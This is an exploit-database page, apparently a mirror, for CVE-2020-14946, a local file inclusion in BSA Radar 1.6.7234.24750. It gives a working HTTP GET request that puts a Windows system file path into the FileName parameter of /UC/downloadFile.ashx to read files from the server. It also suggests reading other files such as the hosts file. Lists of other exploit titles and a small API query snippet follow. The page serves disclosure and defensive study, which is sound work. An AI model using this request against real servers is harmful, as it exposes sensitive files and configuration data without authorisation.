Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"BSA Radar 1.6.7234.24750 - Local File Inclusion"

Author

Exploit author

"William Summerhill"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion
# Date: 2020-07-08
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14946 - Local File Inclusion

# Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X 
# and lower allows users to download transaction files. When downloading the files, 
# a user is able to view local files on the web server by manipulating the FileName 
# and FilePath parameters in the URL, or while using a proxy. This vulnerability could 
# be used to view local sensitive files or configuration files on the backend server.

	Vulnerable endpoint: /UC/downloadFile.ashx

	The current user is required to have valid privileges to send requests to the target vulnerable endpoint.

Proof of Concept:

	HTTP Request PoC:

		VALID REQUEST:
		GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6

		LFI EXPLOIT REQUEST:
		GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6

	The entire LFI path can be injected into the "FileName" parameter in order to enumerate existing files on the server. Other LFI files can be tested (such as the Windows hosts file) for further verification and disclosures.

Tested on: Windows

CVE: CVE-2020-14946

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946
Release Date Title Type Platform Author
2020-10-23 "Lot Reservation Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'id' SQL Injection" webapps php "Ankita Pal"
2020-10-23 "Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-10-20 "WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)" webapps multiple n1x_
2020-10-14 "NodeBB Forum 1.12.2-1.14.2 - Account Takeover" webapps multiple "Muhammed Eren Uygun"
2020-10-12 "Liman 0.7 - Cross-Site Request Forgery (Change Password)" webapps multiple "George Tsimpidas"
2020-10-05 "MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection" webapps multiple "Aviv Beniash"
2020-09-28 "Joplin 1.0.245 - Arbitrary Code Execution (PoC)" webapps multiple "Ademar Nowasky Junior"
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-22 "Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution" webapps multiple "Milad Fadavvi"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
Release Date Title Type Platform Author
2020-07-14 "BSA Radar 1.6.7234.24750 - Local File Inclusion" webapps multiple "William Summerhill"
2020-07-08 "BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)" webapps hardware "William Summerhill"
2020-07-07 "BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation" webapps multiple "William Summerhill"
2020-06-24 "BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting" webapps multiple "William Summerhill"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48666/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.